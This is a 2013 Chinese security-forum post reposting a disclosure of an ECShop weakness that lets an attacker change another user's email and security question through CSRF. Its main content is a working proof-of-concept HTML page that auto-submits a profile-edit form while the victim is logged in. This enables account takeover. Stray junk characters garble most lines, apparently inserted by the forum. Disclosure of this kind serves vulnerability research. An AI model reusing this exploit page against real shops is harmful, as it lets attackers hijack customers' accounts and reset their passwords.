找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1942|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:' W' T9 }" a4 G: I9 R" L
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
+ N1 l- N$ K+ F! S: C" M* F
" x5 D1 U2 E3 f1 _) zDemo For:http://www.wooyun.org/bug.php?action=view&id=3950 N  K" a6 O) w6 Y3 B* k0 n

% {" g, R/ {" W6 T( m' m详细说明:: V( z( g% X# B- M
利用csrf和xss可以突破官方所说的“障碍”
2 |( y1 [$ ], w3 Q) Hxss版本已经有人说明
0 o( B8 J( H' k# o, M这里给出csrf版本
  o4 I" e6 H# w
& k3 U+ p/ a8 a7 K( W  b# B4 f, t漏洞证明:4 ]. g0 R  r6 k) g9 G: u( v+ I
<html>
3 j! T" c* t4 P' i; B# w<body># @( r! K$ y3 E" D
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">/ v/ {2 F, O1 o; f
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">) ]) y2 s0 M+ Z2 O& Y. D
<INPUT TYPE="text" NAME="act" value="act_edit_profile">9 W) y8 O  t: t2 n! j% f' u0 J+ u* v0 {% G
<INPUT TYPE="text" NAME="sel_question" value="ecshop">* x) B4 P( H- i
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">' B! A+ L2 j3 K! h8 \
</body>
5 r8 `; R5 ]* O2 n/ u7 o# f<script>
* U) a( P. K2 Q# b+ @document.forms[0].submit();
! s* r% E, T( V6 O, O  w5 ?: c- U</script>% [- ?8 g* `/ {5 \& b1 B* P
</html>
! o; p' W: P3 m" k2 Z9 {构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失+ X/ {! Z' |. X' s8 N0 M# c) L

, g$ _/ X0 A* V1 w+ D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表